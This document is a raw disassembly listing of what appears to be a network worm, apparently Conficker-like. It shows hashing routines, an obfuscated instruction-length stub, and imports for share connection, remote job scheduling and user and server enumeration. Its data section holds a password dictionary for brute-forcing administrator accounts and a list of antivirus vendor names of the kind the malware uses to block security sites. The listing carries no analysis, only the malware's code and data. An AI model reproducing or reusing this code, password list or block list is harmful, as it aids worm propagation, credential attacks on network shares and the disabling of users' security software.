arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
xor eax, eax
cmp esi, eax
jnz short loc_9B7B8C
push 3
jmp short loc_9B7B9F
; ---------------------------------------------------------------------------
loc_9B7B8C: ; CODE XREF: sub_9B7B7B+B�j
cmp [esi+0CCh], eax
jnz short loc_9B7B98
push 5
jmp short loc_9B7B9F
; ---------------------------------------------------------------------------
loc_9B7B98: ; CODE XREF: sub_9B7B7B+17�j
cmp [ebp+arg_4], eax
jnz short loc_9B7BA5
push 8
loc_9B7B9F: ; CODE XREF: sub_9B7B7B+F�j
; sub_9B7B7B+1B�j
pop eax
jmp loc_9B7CA0
; ---------------------------------------------------------------------------
loc_9B7BA5: ; CODE XREF: sub_9B7B7B+20�j
cmp [ebp+arg_C], eax
push ebx
mov [ebp+arg_0], eax
jb loc_9B7C9D
ja short loc_9B7BBD
cmp [ebp+arg_8], eax
jbe loc_9B7C9D
loc_9B7BBD: ; CODE XREF: sub_9B7B7B+37�j
; sub_9B7B7B+10E�j ...
mov edx, [ebp+arg_8]
mov eax, [ebp+arg_C]
mov ecx, 1000h
sub ecx, [esi+3B3Ch]
xor ebx, ebx
sub edx, [ebp+arg_0]
sbb eax, ebx
cmp eax, ebx
ja short loc_9B7BE3
jb short loc_9B7BDF
cmp edx, ecx
jnb short loc_9B7BE3
loc_9B7BDF: ; CODE XREF: sub_9B7B7B+5E�j
mov ebx, edx
jmp short loc_9B7BE5
; ---------------------------------------------------------------------------
loc_9B7BE3: ; CODE XREF: sub_9B7B7B+5C�j
; sub_9B7B7B+62�j
mov ebx, ecx
loc_9B7BE5: ; CODE XREF: sub_9B7B7B+66�j
test bl, 7
jnz short loc_9B7C1F
mov eax, [esi+3B3Ch]
test al, 7
jnz short loc_9B7C1F
test byte ptr [ebp+arg_0], 7
jnz short loc_9B7C1F
mov ecx, ebx
shr ecx, 3
push ecx ; Size
mov ecx, [ebp+arg_0]
shr ecx, 3
add ecx, [ebp+arg_4]
shr eax, 3
push ecx ; Src
lea eax, [eax+esi+338h]
push eax ; Dst
call memcpy
add esp, 0Ch
jmp short loc_9B7C3F
; ---------------------------------------------------------------------------
loc_9B7C1F: ; CODE XREF: sub_9B7B7B+6D�j
; sub_9B7B7B+77�j ...
mov eax, [ebp+arg_0]
shr eax, 3
add eax, [ebp+arg_4]
push ebx
push eax
push dword ptr [esi+3B3Ch]
lea eax, [esi+338h]
push eax
call sub_9B7781
add esp, 10h
loc_9B7C3F: ; CODE XREF: sub_9B7B7B+A2�j
add [esi+3B3Ch], ebx
add [ebp+arg_0], ebx
add [esi+0D0h], ebx
mov eax, [esi+3B3Ch]
adc dword ptr [esi+0D4h], 0
cmp eax, 1000h
jnz short loc_9B7C84
xor eax, eax
cmp eax, [ebp+arg_C]
ja short loc_9B7C84
jb short loc_9B7C73
mov eax, [ebp+arg_0]
cmp eax, [ebp+arg_8]
jnb short loc_9B7C84
loc_9B7C73: ; CODE XREF: sub_9B7B7B+EE�j
push 0
push 1
push esi
call sub_9B7A26
add esp, 0Ch
test eax, eax
jnz short loc_9B7C9F
loc_9B7C84: ; CODE XREF: sub_9B7B7B+E5�j
; sub_9B7B7B+EC�j ...
xor eax, eax
cmp eax, [ebp+arg_C]
jb loc_9B7BBD
ja short loc_9B7C9D
mov eax, [ebp+arg_8]
cmp [ebp+arg_0], eax
jb loc_9B7BBD
loc_9B7C9D: ; CODE XREF: sub_9B7B7B+31�j
; sub_9B7B7B+3C�j ...
xor eax, eax
loc_9B7C9F: ; CODE XREF: sub_9B7B7B+107�j
pop ebx
loc_9B7CA0: ; CODE XREF: sub_9B7B7B+25�j
pop esi
pop ebp
retn
sub_9B7B7B endp
; =============== S U B R O U T I N E =======================================
sub_9B7CA3 proc near ; CODE XREF: sub_9B7DEE+90�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_9B7CB1
push 3
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_9B7CB1: ; CODE XREF: sub_9B7CA3+7�j
mov eax, [esi]
add eax, 7
push 8
cdq
pop ecx
idiv ecx
test eax, eax
jle short loc_9B7D0F
push ebx
push ebp
mov [esp+0Ch+arg_0], 0FFFFFFF8h
sub [esp+0Ch+arg_0], esi
push edi
lea ecx, [esi+8]
lea edi, [esi+49h]
loc_9B7CD5: ; CODE XREF: sub_9B7CA3+67�j
movzx eax, byte ptr [ecx]
shr eax, 4
mov al, byte_9A7150[eax]
mov [edi-1], al
xor eax, eax
mov al, [ecx]
push 8
pop ebp
and eax, 0Fh
mov al, byte_9A7150[eax]
mov [edi], al
mov eax, [esp+10h+arg_0]
inc ecx
lea ebx, [eax+ecx]
mov eax, [esi]
add eax, 7
cdq
idiv ebp
inc edi
inc edi
cmp ebx, eax
jl short loc_9B7CD5
pop edi
pop ebp
pop ebx
loc_9B7D0F: ; CODE XREF: sub_9B7CA3+1B�j
mov eax, [esi]
add eax, 3
push 4
cdq
pop ecx
idiv ecx
mov byte ptr [eax+esi+48h], 0
xor eax, eax
pop esi
retn
sub_9B7CA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B7D23 proc near ; CODE XREF: sub_9B7DEE+8A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
mov esi, [ebp+arg_0]
mov ecx, [esi]
push edi
lea eax, [ecx+7]
cdq
push 8
pop edi
idiv edi
push 8
mov ebx, 80h
mov edi, eax
mov eax, ecx
cdq
pop ecx
idiv ecx
test edi, edi
mov [ebp+var_C], edi
mov [ebp+var_8], edx
jle short loc_9B7D68
mov ecx, ebx
lea eax, [esi+8]
sub ecx, edi
mov [ebp+arg_0], edi
loc_9B7D5D: ; CODE XREF: sub_9B7D23+43�j
mov dl, [ecx+eax]
mov [eax], dl
inc eax
dec [ebp+arg_0]
jnz short loc_9B7D5D
loc_9B7D68: ; CODE XREF: sub_9B7D23+2E�j
cmp edi, ebx
jge short loc_9B7D89
lea edx, [edi+esi+8]
mov ecx, ebx
sub ecx, edi
mov edi, edx
mov edx, ecx
shr ecx, 2
xor eax, eax
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
mov edi, [ebp+var_C]
loc_9B7D89: ; CODE XREF: sub_9B7D23+47�j
cmp [ebp+var_8], 0
jle short loc_9B7DE9
test edi, edi
jle short loc_9B7DE9
push 8
pop eax
sub eax, [ebp+var_8]
mov [ebp+var_4], 0FFFFFFF9h
sub [ebp+var_4], esi
mov [ebp+arg_0], 0FFFFFFF8h
sub [ebp+arg_0], esi
mov [ebp+var_10], eax
lea eax, [esi+8]
loc_9B7DB3: ; CODE XREF: sub_9B7D23+C4�j
mov dl, [eax]
mov ecx, [ebp+var_10]
shl dl, cl
mov ecx, [ebp+var_4]
add ecx, eax
cmp ecx, ebx
mov [eax], dl
jge short loc_9B7DDF
mov ecx, [ebp+arg_0]
mov edi, [ebp+var_C]
add ecx, eax
mov bl, [ecx+esi+9]
mov cl, byte ptr [ebp+var_8]
shr bl, cl
or bl, dl
mov [eax], bl
mov ebx, 80h
loc_9B7DDF: ; CODE XREF: sub_9B7D23+A0�j
mov ecx, [ebp+arg_0]
inc eax
add ecx, eax
cmp ecx, edi
jl short loc_9B7DB3
loc_9B7DE9: ; CODE XREF: sub_9B7D23+6A�j
; sub_9B7D23+6E�j
pop edi
pop esi
pop ebx
leave
retn
sub_9B7D23 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9B7DEE(int,void *Dst)
sub_9B7DEE proc near ; CODE XREF: sub_9B6BB9+40�p
arg_0 = dword ptr 4
Dst = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_9B7DFB
push 3
jmp short loc_9B7E06
; ---------------------------------------------------------------------------
loc_9B7DFB: ; CODE XREF: sub_9B7DEE+7�j
cmp dword ptr [esi+0CCh], 0
jnz short loc_9B7E09
push 5
loc_9B7E06: ; CODE XREF: sub_9B7DEE+B�j
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_9B7E09: ; CODE XREF: sub_9B7DEE+14�j
push ebx
xor ebx, ebx
inc ebx
cmp [esi+0E0h], ebx
jz short loc_9B7E8C
mov ecx, [esi+134h]
cmp ecx, ebx
mov eax, ebx
jz short loc_9B7E3A
jl short loc_9B7E3A
lea ecx, [esi+3B3Ch]
loc_9B7E29: ; CODE XREF: sub_9B7DEE+4A�j
cmp dword ptr [ecx], 0
ja short loc_9B7E3A
inc eax
add ecx, 4
cmp eax, [esi+134h]
jle short loc_9B7E29
loc_9B7E3A: ; CODE XREF: sub_9B7DEE+31�j
; sub_9B7DEE+33�j ...
push ebx
push eax
push esi
call sub_9B7A26
add esp, 0Ch
test eax, eax
jnz short loc_9B7E8E
push edi
lea edi, [esi+8]
push 10h
push edi
call sub_9B774C
cmp [esp+14h+Dst], 0
pop ecx
pop ecx
jz short loc_9B7E77
mov eax, [esi]
add eax, 7
push 8
pop ecx
cdq
idiv ecx
push eax ; Size
push edi ; Src
push [esp+14h+Dst] ; Dst
call memcpy
add esp, 0Ch
loc_9B7E77: ; CODE XREF: sub_9B7DEE+6E�j
push esi
call sub_9B7D23
push esi
call sub_9B7CA3
pop ecx
pop ecx
mov [esi+0E0h], ebx
pop edi
loc_9B7E8C: ; CODE XREF: sub_9B7DEE+25�j
xor eax, eax
loc_9B7E8E: ; CODE XREF: sub_9B7DEE+59�j
pop ebx
pop esi
retn
sub_9B7DEE endp
; ---------------------------------------------------------------------------
align 10h
loc_9B7EA0: ; CODE XREF: sub_9AB2C9+58�p
pusha
cld
xor edx, edx
mov esi, [esp+24h]
mov ebp, esp
push 1097F71Ch
push 0F71C6780h
push 17389718h
push 101CB718h
push 17302C17h
push 18173017h
push 0F715F547h
push 4C103748h
push 272CE7F7h
push 0F7AC6087h
push 1C121C52h
push 7C10871Ch
push 201C701Ch
push 4767602Bh
push 20211011h
push 40121625h
push 82872022h
push 47201220h
push 13101419h
push 18271013h
push 28858260h
push 15124045h
push 5016A0C7h
push 28191812h
push 0F2401812h
push 19154127h
push 50F0F011h
mov ecx, 15124710h
push ecx
push 11151247h
push 10111512h
push 47101115h
mov eax, 12472015h
push eax
push eax
push 12471A10h
add cl, 10h
push ecx
sub cl, 20h
push ecx
xor ecx, ecx
dec ecx
loc_9B7F5D: ; CODE XREF: .text:009B7F80�j
inc ecx
mov edi, esp
loc_9B7F60: ; CODE XREF: .text:009B7F8A�j
lodsb
mov bh, al
loc_9B7F63: ; CODE XREF: .text:009B7F6B�j
mov ah, [edi]
inc edi
shr ah, 4
sub al, ah
jnb short loc_9B7F63
mov al, [edi-1]
and al, 0Fh
cmp al, 0Ch
jnz short loc_9B7F79
pop edx
not edx
loc_9B7F79: ; CODE XREF: .text:009B7F74�j
inc edx
cmp al, 0
jz short loc_9B7FBF
cmp al, 1
jz short loc_9B7F5D
add edi, 51h
cmp al, 0Ah
jz short loc_9B7F60
mov edi, [ebp+24h]
inc edx
cmp al, 2
jz short loc_9B7FBF
cmp al, 7
jz short loc_9B7FC7
cmp al, 0Bh
jz short loc_9B801A
loc_9B7F9C: ; CODE XREF: .text:009B8025�j
inc edx
cmp al, 3
jz short loc_9B7FBF
cmp al, 8
jz short loc_9B7FC7
inc edx
cmp al, 4
jz short loc_9B7FBF
inc edx
inc edx
pusha
mov al, 66h
repne scasb
popa
jnz short loc_9B7FB6
loc_9B7FB4: ; CODE XREF: .text:009B8030�j
; .text:009B8048�j
dec edx
dec edx
loc_9B7FB6: ; CODE XREF: .text:009B7FB2�j
cmp al, 9
jz short loc_9B7FC7
sub al, 5
jz short loc_9B802A
loc_9B7FBE: ; CODE XREF: .text:009B800A�j
; .text:009B800E�j ...
inc edx
loc_9B7FBF: ; CODE XREF: .text:009B7F7C�j
; .text:009B7F92�j ...
mov esp, ebp
mov [esp+1Ch], edx
popa
retn
; ---------------------------------------------------------------------------
loc_9B7FC7: ; CODE XREF: .text:009B7F96�j
; .text:009B7FA3�j ...
lodsb
mov ah, al
shr al, 7
jb short loc_9B7FE1
jz short loc_9B7FE5
add dl, 4
pusha
mov al, 67h
repne scasb
popa
jnz short loc_9B7FE5
sub dl, 3
dec al
loc_9B7FE1: ; CODE XREF: .text:009B7FCD�j
jnz short loc_9B7FBF
inc edx
inc eax
loc_9B7FE5: ; CODE XREF: .text:009B7FCF�j
; .text:009B7FDA�j
and ah, 7
pusha
mov al, 67h
repne scasb
popa
jz short loc_9B8003
cmp ah, 4
jz short loc_9B800C
cmp ah, 5
jnz short loc_9B7FBF
dec al
jz short loc_9B7FBF
loc_9B7FFE: ; CODE XREF: .text:009B8018�j
add dl, 4
jmp short loc_9B7FBF
; ---------------------------------------------------------------------------
loc_9B8003: ; CODE XREF: .text:009B7FEE�j
cmp ax, 600h
jnz short loc_9B7FBF
inc edx
jmp short loc_9B7FBE
; ---------------------------------------------------------------------------
loc_9B800C: ; CODE XREF: .text:009B7FF3�j
cmp al, 0
jnz short loc_9B7FBE
lodsb
and al, 7
sub al, 5
jnz short loc_9B7FBE
inc edx
jmp short loc_9B7FFE
; ---------------------------------------------------------------------------
loc_9B801A: ; CODE XREF: .text:009B7F9A�j
test byte ptr [esi], 38h
jnz short loc_9B7FC7
mov al, 8
shr bh, 1
adc al, 0
jmp loc_9B7F9C
; ---------------------------------------------------------------------------
loc_9B802A: ; CODE XREF: .text:009B7FBC�j
sub bh, 0A0h
cmp bh, 4
jnb short loc_9B7FB4
pusha
mov al, 67h
repne scasb
popa
jnz short loc_9B803C
dec edx
dec edx
loc_9B803C: ; CODE XREF: .text:009B8038�j
pusha
mov al, 66h
repne scasb
popa
jz loc_9B7FBE
jnz loc_9B7FB4
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
; [00000020 BYTES: COLLAPSED FUNCTION __global_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __unwind_handler. PRESS KEYPAD "+" TO EXPAND]
; [00000068 BYTES: COLLAPSED FUNCTION __local_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __abnormal_termination. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__NLG_Notify1:
push ebx
push ecx
mov ebx, offset dword_9BADFC
jmp short loc_9B8130
; [00000018 BYTES: COLLAPSED FUNCTION __NLG_Notify. PRESS KEYPAD "+" TO EXPAND]
align 10h
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; [000000BD BYTES: COLLAPSED FUNCTION unknown_libname_1. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
unknown_libname_2: ; Microsoft VisualC 2-8/net runtime
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call __local_unwind2
add esp, 8
pop ebp
retn 4
; [00000006 BYTES: COLLAPSED FUNCTION strlen. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION memcmp. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION memcpy. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION memset. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION strcat. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION strcmp. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION strcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002F BYTES: COLLAPSED FUNCTION __alloca_probe. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000068 BYTES: COLLAPSED FUNCTION __aulldiv. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000034 BYTES: COLLAPSED FUNCTION __allmul. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION log. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION sin. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION labs. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000021 BYTES: COLLAPSED FUNCTION __allshr. PRESS KEYPAD "+" TO EXPAND]
; [000000AB BYTES: COLLAPSED FUNCTION _CRT_INIT(x,x,x). PRESS KEYPAD "+" TO EXPAND]
; [0000009D BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
align 2
; [00000006 BYTES: COLLAPSED FUNCTION _initterm. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION Module32Next. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION Module32First. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION CreateToolhelp32Snapshot. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION Process32Next. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION Process32First. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION Thread32Next. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION Thread32First. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION RtlUnwind. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION ntohl. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION inet_addr. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION __WSAFDIsSet. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION ntohl_0. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION NdrClientCall2. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION ObtainUserAgentString. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION WNetCancelConnection2W. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION WNetAddConnection2W. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION WNetAddConnection2A. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION WNetCancelConnection2A. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION VerQueryValueA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GetFileVersionInfoA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GetFileVersionInfoSizeA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION NetApiBufferFree. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION NetScheduleJobDel. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION NetScheduleJobEnum. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION NetScheduleJobAdd. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION NetUserEnum. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION NetServerEnum. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION NetWkstaGetInfo. PRESS KEYPAD "+" TO EXPAND]
; [0000003B BYTES: COLLAPSED FUNCTION __SEH_prolog. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __SEH_epilog. PRESS KEYPAD "+" TO EXPAND]
dd 697h dup(0)
dword_9BA000 dd 0 ; DATA XREF: _CRT_INIT(x,x,x)+4F�o
dword_9BA004 dd 3 dup(0) ; DATA XREF: _CRT_INIT(x,x,x)+4A�o
off_9BA010 dd offset WindowName ; DATA XREF: sub_9A96FE+130�r
; "recv"
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a1234567890 ; "1234567890"
dd offset a123123 ; "123123"
dd offset a12321 ; "12321"
dd offset a123321 ; "123321"
dd offset a123abc ; "123abc"
dd offset a123qwe ; "123qwe"
dd offset a123asd ; "123asd"
dd offset a1234abcd ; "1234abcd"
dd offset a1234qwer ; "1234qwer"
dd offset a1q2w3e ; "1q2w3e"
dd offset aA1b2c3 ; "a1b2c3"
dd offset aAdmin_0 ; "admin"
dd offset aAdmin ; "Admin"
dd offset aAdministrator ; "administrator"
dd offset aNimda ; "nimda"
dd offset aQwewq ; "qwewq"
dd offset aQweewq ; "qweewq"
dd offset aQwerty ; "qwerty"
dd offset aQweasd ; "qweasd"
dd offset aAsdsa ; "asdsa"
dd offset aAsddsa ; "asddsa"
dd offset aAsdzxc ; "asdzxc"
dd offset aAsdfgh ; "asdfgh"
dd offset aQweasdzxc ; "qweasdzxc"
dd offset aQ1w2e3 ; "q1w2e3"
dd offset aQazwsx ; "qazwsx"
dd offset aQazwsxedc ; "qazwsxedc"
dd offset aZxcxz ; "zxcxz"
dd offset aZxccxz ; "zxccxz"
dd offset aZxcvb ; "zxcvb"
dd offset aZxcvbn ; "zxcvbn"
dd offset aPasswd ; "passwd"
dd offset aPassword_0 ; "password"
dd offset aPassword ; "Password"
dd offset aLogin_0 ; "login"
dd offset aLogin ; "Login"
dd offset aPass ; "pass"
dd offset aMypass ; "mypass"
dd offset aMypassword ; "mypassword"
dd offset aAdminadmin ; "adminadmin"
dd offset aRoot ; "root"
dd offset aRootroot ; "rootroot"
dd offset aTest ; "test"
dd offset aTesttest ; "testtest"
dd offset aTemp ; "temp"
dd offset aTemptemp ; "temptemp"
dd offset aFoofoo ; "foofoo"
dd offset aFoobar ; "foobar"
dd offset aDefault ; "default"
dd offset aPassword1 ; "password1"
dd offset aPassword12 ; "password12"
dd offset aPassword123 ; "password123"
dd offset aAdmin1 ; "admin1"
dd offset aAdmin12 ; "admin12"
dd offset aAdmin123 ; "admin123"
dd offset aPass1 ; "pass1"
dd offset aPass12 ; "pass12"
dd offset aPass123 ; "pass123"
dd offset aRoot123 ; "root123"
dd offset aPw123 ; "pw123"
dd offset aAbc123 ; "abc123"
dd offset aQwe123 ; "qwe123"
dd offset aTest123 ; "test123"
dd offset aTemp123 ; "temp123"
dd offset aMypc123 ; "mypc123"
dd offset aHome123 ; "home123"
dd offset aWork123 ; "work123"
dd offset aBoss123 ; "boss123"
dd offset aLove123 ; "love123"
dd offset aSample ; "sample"
dd offset aExample ; "example"
dd offset aInternet_0 ; "internet"
dd offset aInternet ; "Internet"
dd offset aNopass ; "nopass"
dd offset aNopassword ; "nopassword"
dd offset aNothing ; "nothing"
dd offset aIhavenopass ; "ihavenopass"
dd offset aTemporary ; "temporary"
dd offset aManager ; "manager"
dd offset aBusiness ; "business"
dd offset aOracle ; "oracle"
dd offset aLotus ; "lotus"
dd offset aDatabase ; "database"
dd offset aBackup ; "backup"
dd offset aOwner ; "owner"
dd offset aComputer ; "computer"
dd offset aServer ; "server"
dd offset aSecret ; "secret"
dd offset aSuper ; "super"
dd offset aShare ; "share"
dd offset aSuperuser ; "superuser"
dd offset aSupervisor ; "supervisor"
dd offset aOffice ; "office"
dd offset aShadow ; "shadow"
dd offset aSystem ; "system"
dd offset aPublic ; "public"
dd offset aSecure ; "secure"
dd offset aSecurity ; "security"
dd offset aDesktop ; "desktop"
dd offset aChangeme ; "changeme"
dd offset aCodename ; "codename"
dd offset aCodeword ; "codeword"
dd offset aNobody ; "nobody"
dd offset aCluster ; "cluster"
dd offset aCustomer ; "customer"
dd offset aExchange ; "exchange"
dd offset aExplorer ; "explorer"
dd offset aCampus ; "campus"
dd offset aMoney ; "money"
dd offset aAccess ; "access"
dd offset aDomain ; "domain"
dd offset aLetmein ; "letmein"
dd offset aLetitbe ; "letitbe"
dd offset aAnything ; "anything"
dd offset aUnknown ; "unknown"
dd offset aMonitor ; "monitor"
dd offset aWindows ; "windows"
dd offset aFiles ; "files"
dd offset aAcademia ; "academia"
dd offset aAccount ; "account"
dd offset aStudent ; "student"
dd offset aFreedom ; "freedom"
dd offset aForever ; "forever"
dd offset aCookie ; "cookie"
dd offset aCoffee ; "coffee"
dd offset aMarket ; "market"
dd offset aPrivate ; "private"
dd offset aGames ; "games"
dd offset aKiller ; "killer"
dd offset aController ; "controller"
dd offset aIntranet ; "intranet"
dd offset aWork ; "work"
dd offset aHome ; "home"
dd offset aJob ; "job"
dd offset aFoo ; "foo"
dd offset aWeb ; "web"
dd offset aFile ; "file"
dd offset aSql ; "sql"
dd offset aAaa_0 ; "aaa"
dd offset aAaaa ; "aaaa"
dd offset aAaaaa ; "aaaaa"
dd offset aQqq ; "qqq"
dd offset aQqqq ; "qqqq"
dd offset aQqqqq ; "qqqqq"
dd offset aXxx ; "xxx"
dd offset aXxxx ; "xxxx"
dd offset aXxxxx ; "xxxxx"
dd offset aZzz ; "zzz"
dd offset aZzzz ; "zzzz"
dd offset aZzzzz ; "zzzzz"
dd offset aFuck ; "fuck"
dd offset a12 ; "12"
dd offset a21 ; "21"
dd offset a321 ; "321"
dd offset a4321 ; "4321"
dd offset a54321 ; "54321"
dd offset a654321 ; "654321"
dd offset a7654321 ; "7654321"
dd offset a87654321 ; "87654321"
dd offset a987654321 ; "987654321"
dd offset a0987654321 ; "0987654321"
dd offset PrefixString ; "ror"
dd offset a00 ; "00"
dd offset a000 ; "000"
dd offset a0000 ; "0000"
dd offset a00000 ; "00000"
dd offset a00000 ; "00000"
dd offset a0000000 ; "0000000"
dd offset a00000000 ; "00000000"
dd offset a1 ; "1"
dd offset a11 ; "11"
dd offset a111 ; "111"
dd offset a1111 ; "1111"
dd offset a11111 ; "11111"
dd offset a111111 ; "111111"
dd offset a1111111 ; "1111111"
dd offset a11111111 ; "11111111"
dd offset a2 ; "2"
dd offset a22 ; "22"
dd offset a222 ; "222"
dd offset a2222 ; "2222"
dd offset a22222 ; "22222"
dd offset a222222 ; "222222"
dd offset a2222222 ; "2222222"
dd offset a22222222 ; "22222222"
dd offset a3 ; "3"
dd offset a33 ; "33"
dd offset a333 ; "333"
dd offset a3333 ; "3333"
dd offset a33333 ; "33333"
dd offset a333333 ; "333333"
dd offset a3333333 ; "3333333"
dd offset a33333333 ; "33333333"
dd offset a4 ; "4"
dd offset a44 ; "44"
dd offset a444 ; "444"
dd offset a4444 ; "4444"
dd offset a44444 ; "44444"
dd offset a444444 ; "444444"
dd offset a4444444 ; "4444444"
dd offset a44444444 ; "44444444"
dd offset a5 ; "5"
dd offset a55 ; "55"
dd offset a555 ; "555"
dd offset a5555 ; "5555"
dd offset a55555 ; "55555"
dd offset a555555 ; "555555"
dd offset a5555555 ; "5555555"
dd offset a55555555 ; "55555555"
dd offset a6 ; "6"
dd offset a66 ; "66"
dd offset a666 ; "666"
dd offset a6666 ; "6666"
dd offset a66666 ; "66666"
dd offset a666666 ; "666666"
dd offset a6666666 ; "6666666"
dd offset a66666666 ; "66666666"
dd offset a7 ; "7"
dd offset a77 ; "77"
dd offset a777 ; "777"
dd offset a7777 ; "7777"
dd offset a77777 ; "77777"
dd offset a777777 ; "777777"
dd offset a7777777 ; "7777777"
dd offset a77777777 ; "77777777"
dd offset a8 ; "8"
dd offset a88 ; "88"
dd offset a888 ; "888"
dd offset a8888 ; "8888"
dd offset a88888 ; "88888"
dd offset a888888 ; "888888"
dd offset a8888888 ; "8888888"
dd offset a88888888 ; "88888888"
dd offset a9 ; "9"
dd offset a99 ; "99"
dd offset a999 ; "999"
dd offset a9999 ; "9999"
dd offset a99999 ; "99999"
dd offset a999999 ; "999999"
dd offset a9999999 ; "9999999"
dd offset dword_9A26F0+4
align 8
off_9BA3F8 dd offset aVirus ; DATA XREF: sub_9A9D29:loc_9A9D46�r
; "virus"
dd offset aSpyware ; "spyware"
dd offset aMalware ; "malware"
dd offset aRootkit ; "rootkit"
dd offset aDefender ; "defender"
dd offset aMicrosoft ; "microsoft"
dd offset aSymantec ; "symantec"
dd offset aNorton ; "norton"
dd offset aMcafee ; "mcafee"
dd offset aTrendmicro ; "trendmicro"
dd offset aSophos ; "sophos"
dd offset aPanda ; "panda"
dd offset aEtrust ; "etrust"
dd offset aNetworkassocia ; "networkassociates"
dd offset aComputerassoci ; "computerassociates"
dd offset aFSecure ; "f-secure"
dd offset aKaspersky ; "kaspersky"
dd offset aJotti ; "jotti"
dd offset aFProt ; "f-prot"
dd offset aNod32 ; "nod32"
dd offset aEset ; "eset"
dd offset aGrisoft ; "grisoft"
dd offset aDrweb ; "drweb"
dd offset aCentralcommand ; "centralcommand"
dd offset aAhnlab ; "ahnlab"
dd offset aEsafe ; "esafe"
dd offset aAvast ; "avast"
dd offset aAvira ; "avira"
dd offset aQuickheal ; "quickheal"
dd offset aComodo ; "comodo"
dd offset aClamav ; "clamav"
dd offset aEwido ; "ewido"
dd offset aFortinet ; "fortinet"
dd offset aGdata ; "gdata"
dd offset aHacksoft ; "hacksoft"
dd offset aHauri ; "hauri"
dd offset aIkarus ; "ikarus"
dd offset aK7computing ; "k7computing"
dd offset aNorman ; "norman"
